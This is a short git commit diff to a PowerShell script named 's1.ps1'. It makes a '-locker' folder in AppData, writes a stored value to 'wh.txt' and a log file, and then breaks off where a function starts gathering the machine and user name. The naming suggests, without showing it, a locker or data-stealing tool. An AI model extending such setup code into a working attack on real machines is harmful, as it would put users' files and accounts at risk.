Update s1.ps1
This commit is contained in:
parent
ab4e8b7211
commit
41707278ca
1 changed files with 1 additions and 2 deletions
|
@ -1,7 +1,6 @@
|
||||||
if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"};
|
if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"};
|
||||||
echo $dc > "$env:appdata\-locker\wh.txt";
|
echo $dc > "$env:appdata\-locker\wh.txt";
|
||||||
|
echo $log > "$env:appdata\-locker\log.txt";
|
||||||
if (!$log) { echo $log > "$env:appdata\-locker\log.txt" }
|
|
||||||
|
|
||||||
function s1 {
|
function s1 {
|
||||||
$user = "$env:COMPUTERNAME\$env:USERNAME"
|
$user = "$env:COMPUTERNAME\$env:USERNAME"
|
||||||
|
|
Loading…
Reference in a new issue